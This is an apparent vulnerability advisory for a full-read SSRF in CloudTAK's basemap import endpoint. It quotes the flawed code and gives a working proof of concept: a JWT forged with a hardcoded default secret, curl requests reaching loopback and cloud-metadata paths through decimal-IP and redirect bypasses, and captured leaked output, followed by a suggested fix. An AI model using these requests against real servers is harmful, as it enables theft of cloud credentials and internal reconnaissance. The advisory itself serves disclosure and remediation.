PT-2026-60895 · Npm · @Tak-Ps/Cloudtak

CVE-2026-54546

·

Publicado

2026-07-17

·

Atualizado

2026-07-17

CVSS v3.1

5.0

Média

VetorAV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary

PUT /api/basemap (the basemap import endpoint) fetches an attacker-supplied URL server-side with no SSRF protection whatsoever. Any authenticated user can submit a JSON body { "type": "...", "url": "<attacker url>" }; the server calls fetch(url) against that URL and then reflects the response body (name, attribution, tiles[0], zoom levels) back to the caller in the OptionalTileJSON response.
Because there is no IP-address classification, internal-only services are reachable: cloud metadata (http://169.254.169.254/...), loopback (http://127.0.0.1/...), RFC1918 ranges, and CGNAT. The response body flows back to the attacker, making this a full-read SSRF (not blind): the attacker reads the internal HTTP response verbatim. This enables theft of cloud instance credentials, internal service enumeration, and reading of internal-only HTTP endpoints from the network position of the CloudTAK API server.
The only URL check in the basemap protocol layer (BasemapProtocol.isValidURL, api/lib/interface-basemap.ts) validates the scheme is http/https only and performs no host/IP filtering — and the import path does not even call it; it goes straight from new URL(rawURL) to fetch(url).
Three independent bypass classes were confirmed end-to-end against a real deployed build:
  1. Direct internal/loopback IP literals.
  2. Alternate IP encodings (e.g. decimal http://2130706433/ = 127.0.0.1).
  3. Redirect following — fetch uses the default redirect: 'follow', so even a public initial host that 302-redirects to an internal address is followed with no re-validation.

Vulnerable code (file:line)

api/routes/basemap.tsimportBasemapURL() and the PUT /basemap handler (line numbers at commit 90d43bdd2fb7d9bd57cbce28c709d9e5207a475a):
ts
// api/routes/basemap.ts
async function importBasemapURL(
  config: Config,
  rawURL: string,
  auth?: Static<typeof BasemapImportAuth>,
): Promise<Static<typeof OptionalTileJSON>> {
  const imported: Static<typeof OptionalTileJSON> = { type: Basemap Type.RASTER };

  let url: URL;
  try {
    url = new URL(rawURL);      // (1) only well-formedness is checked
  } catch (err) {
    throw new Err(400, err instanceof Error ? err : new Error(String(err)), 'Invalid URL');
  }

  if (isEsriLayerURL(String(url))) { /* ... ESRI proxy path ... */ }

  const tjres = await fetch(url);    // (2) SSRF sink — no host/IP guard, default redirect:follow
  if (!tjres.ok) throw new Err(400, null, 'Unable to fetch TileJSON from source URL');

  const tjbody = await tjres.json() as Record<string, any>;
  if (tjbody.name) imported.name = tjbody.name;        // (3) internal response reflected to caller
  if (tjbody.attribution) imported.attribution = tjbody.attribution;
  if (Array.isArray(tjbody.tiles) && tjbody.tiles.length) {
    imported.url = tjbody.tiles[0]...;
  }
  return imported;
}
The handler at api/routes/basemap.ts L139–L233 mounts this as PUT /api/basemap and gates it only with Auth.is auth(config, req) (L157), i.e. any authenticated user with application/json body { type, url } reaches importBasemapURL((req.body).url, (req.body).auth).
BasemapProtocol.isValidURL at api/lib/interface-basemap.ts L136 — the only "validation" in the protocol layer — checks the scheme only and performs no IP filtering:

How input reaches the sink

  1. Attacker authenticates as any CloudTAK user (any role) and obtains a bearer token.
  2. Attacker sends PUT /api/basemap with Content-Type: application/json and body { "type": "...", "url": "<attacker url>" }.
  3. Handler api/routes/basemap.ts L155–L233 calls Auth.is auth(config, req) (L157, any authenticated user passes) then importBasemapURL(config, (req.body).url, (req.body).auth) (L233).
  4. importBasemapURL (L68) does new URL(rawURL) (L79) and, for non-ESRI URLs, reaches const tjres = await fetch(url) (L99) — the SSRF sink. No host/IP classification occurs anywhere on this path; fetch uses the default redirect: 'follow'.
  5. The response JSON is parsed (L104) and name / attribution / tiles[0] are copied into the response object (L106–L117) and returned to the attacker — closing the read loop.

Impact

Server-side full-read SSRF from the network position of the CloudTAK API server, reachable by any single authenticated user:
  • Read the cloud instance metadata endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>) and exfiltrate temporary IAM credentials.
  • Reach and read internal-only HTTP services (databases' HTTP UIs, admin panels, other microservices) not exposed to the internet.
  • Enumerate internal hosts/ports via response/timing differences.
Because the fetched body is reflected back to the caller, the attack is non-blind (full response disclosure), not merely a blind request-forgery.

Proof of concept

End-to-end reproduction against a real deployed CloudTAK API server (not a unit harness). An internal-only sentinel HTTP service is bound to 127.0.0.1:9000 (loopback only, unreachable from outside the host) and returns a TileJSON body carrying secret marker values; the proof is that the CloudTAK server fetches it server-side and reflects those secrets back to the attacker.
  1. Pinned install / build (v13.5.0, commit 64bc1886ff56b62f53d765d69ac90ff9fc23b54b):
bash
git clone https://github.com/dfpc-coe/CloudTAK.git
cd CloudTAK && git checkout v13.5.0
cd api && npm ci
# Postgres reachable at postgres://postgres@localhost:5432/tak ps etl (PostGIS-enabled)
  1. Deploy the real API server (test stack: SigningSecret defaults to the hardcoded coe-wildland-fire, migrations auto-apply, a default server row is auto-generated):
bash
cd api
StackName=test 
SigningSecret=coe-wildland-fire 
POSTGRES='postgres://postgres@localhost:5432/tak ps etl' 
API URL='http://localhost:5001' 
npx tsx index.ts --noevents --nosinks --nogeofence
# => "ok - http://localhost:5001"
  1. Internal-only sentinel (internal sentinel.js) — simulates an internal HTTP service / metadata endpoint, bound to loopback only:
js
const http = require('http');
const fs = require('fs');
const srv = http.createServer((req, res) => {
 fs.appendFileSync('/tmp/ssrf sentinel hits.log',
  `[HIT ${new Date().toISOString()}] ${req.method} ${req.url} from=${req.socket.remoteAddress}
`);
 res.setHeader('Content-Type', 'application/json');
 res.end(JSON.stringify({
  name: 'INTERNAL-METADATA-aws-iam-role-SECRET-7f3a9c',
  attribution: 'leaked-internal-credential::AKIA-SENTINEL-DO-NOT-REDACT-9b2e',
  tiles: ['http://127.0.0.1:9000/internal/{z}/{x}/{y}.png'],
  minzoom: 0, maxzoom: 19
 }));
});
srv.listen(9000, '127.0.0.1', () => console.log('sentinel on 127.0.0.1:9000 (internal-only)'));
bash
node internal sentinel.js &
# A redirector for the redirect-follow variant, also loopback-only:
node -e "require('http').createServer((q,r)=>{r.writeHead(302,{Location:'http://127.0.0.1:9000/via-302-redirect'});r.end();}).listen(9100,'127.0.0.1')" &
  1. Attacker driver — mint a normal user JWT (signed with the deployed SigningSecret) and issue the three requests:
bash
TOK=$(node -e "console.log(require('jsonwebtoken').sign({email:'attacker@evil.test',access:'user'},'coe-wildland-fire'))")

# (a) loopback / metadata-style path
curl -s -X PUT http://localhost:5001/api/basemap 
 -H "Authorization: Bearer $TOK" -H 'Content-Type: application/json' 
 -d '{"type":"raster","url":"http://127.0.0.1:9000/latest/meta-data/iam/security-credentials/"}'

# (b) decimal-IP encoding of 127.0.0.1
curl -s -X PUT http://localhost:5001/api/basemap 
 -H "Authorization: Bearer $TOK" -H 'Content-Type: application/json' 
 -d '{"type":"raster","url":"http://2130706433:9000/decimal-ip-bypass"}'

# (c) public-looking host that 302-redirects to internal (redirect:follow)
curl -s -X PUT http://localhost:5001/api/basemap 
 -H "Authorization: Bearer $TOK" -H 'Content-Type: application/json' 
 -d '{"type":"raster","url":"http://127.0.0.1:9100/start"}'
  1. Captured output — all three return the internal sentinel's secret body to the attacker, and the loopback-only sentinel records the server-side hits:
# HTTP response body returned to the attacker for (a), (b) and (c):
{"type":"raster","name":"INTERNAL-METADATA-aws-iam-role-SECRET-7f3a9c",
 "attribution":"leaked-internal-credential::AKIA-SENTINEL-DO-NOT-REDACT-9b2e",
 "maxzoom":19,"minzoom":0,"url":"http://127.0.0.1:9000/internal/{$z}/{$x}/{$y}.png","format":"png"}

# /tmp/ssrf sentinel hits.log (sentinel is bound to 127.0.0.1 only):
[HIT 2026-06-03T05:01:13.606Z] GET /latest/meta-data/iam/security-credentials/ from=127.0.0.1
[HIT 2026-06-03T05:01:29.099Z] GET /decimal-ip-bypass from=127.0.0.1
[HIT 2026-06-03T05:01:30.151Z] GET /via-302-redirect from=127.0.0.1
The name and attribution values returned to the attacker are read verbatim from the internal service's HTTP response, demonstrating full-read SSRF. In a real cloud deployment the equivalent request http://169.254.169.254/latest/meta-data/iam/security-credentials/<role> returns instance-role credentials.
  1. Negative control — a public host is fetched normally (the endpoint is not globally broken); only the reachability of internal addresses is the defect.

End-to-end reproduction (against pinned version)

All of the above was executed against a real deployed CloudTAK API server built from tag v13.5.0 (commit 64bc1886ff56b62f53d765d69ac90ff9fc23b54b), booted with StackName=test against a PostGIS-enabled Postgres so migrations and routes load unmodified. The vulnerable build returned the internal sentinel's secret body (INTERNAL-METADATA-aws-iam-role-SECRET-7f3a9c, leaked-internal-credential::AKIA-SENTINEL-DO-NOT-REDACT-9b2e) for all three bypass variants, and the loopback-only sentinel recorded the three server-side hits shown above.
After applying the fix below to the same deployed build and restarting, the exact same three attacker requests instead return:
{"status":403,"message":"URL resolves to a disallowed (internal) address","messages":[]}
and the sentinel log records no new hits, while https://example.com/tile.json continues to be fetched (returns 400 "Unable to fetch TileJSON" — it reached the public host, the body just is not valid TileJSON). An isBlockedIP unit check passes 14/14: 169.254.169.254, 127.0.0.1, 10/8, 172.16/12, 192.168/16, 100.64/10, ::1, ::ffff:127.0.0.1, fd00::/8, fe80::/10, 64:ff9b::/96 all blocked; 8.8.8.8, 1.1.1.1, 93.184.216.34 all allowed.

Suggested fix

Add an SSRF guard that (1) resolves the target hostname via DNS and rejects the request if any resolved address falls in a loopback / private / link-local (incl. 169.254.0.0/16 cloud metadata) / CGNAT / IPv6-ULA / IPv4-mapped / NAT64 range, and (2) follows redirects manually, re-validating the Location of every hop so a 302 to an internal address cannot bypass the check. Apply it to the import sink at api/routes/basemap.ts (the fetch(url) call) and to the ESRI/metadata fetch paths in the same file.
A self-contained safeFetch(url) helper (DNS resolution + per-hop re-validation) replacing the bare fetch(url) is sufficient; the same helper should back the other user-URL fetches in the basemap routes. A fix PR implementing exactly this guard is provided.
Note: a literal-string/prefix host blocklist (e.g. matching 127., 10., 192.168.) is not sufficient — it is bypassed by alternate IP encodings, IPv6-mapped forms, and DNS-rebinding hostnames. The guard must classify the resolved numeric address.

Severity

High. Pre-conditions: a single authenticated CloudTAK user account (any role). Impact: server-side full-read access to internal-only HTTP services and the cloud metadata endpoint from the API server's network position, enabling theft of instance credentials and internal reconnaissance. No additional privileges or victim interaction required.

Fix PR link

A fix PR implementing the DNS-resolving, redirect-re-validating safeFetch guard described above is provided to the maintainers via the private temporary fork associated with this advisory. The full guard source is also inlined under the Suggested fix section's reasoning above; the patch adds api/lib/ssrf-guard.ts and replaces the bare fetch(url) at api/routes/basemap.ts with safeFetch(url).

Credits

Reported by tonghuaroot.

Correção

SSRF

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-54546
GHSA-VQRW-QPHH-P34V

Produtos afetados

@Tak-Ps/Cloudtak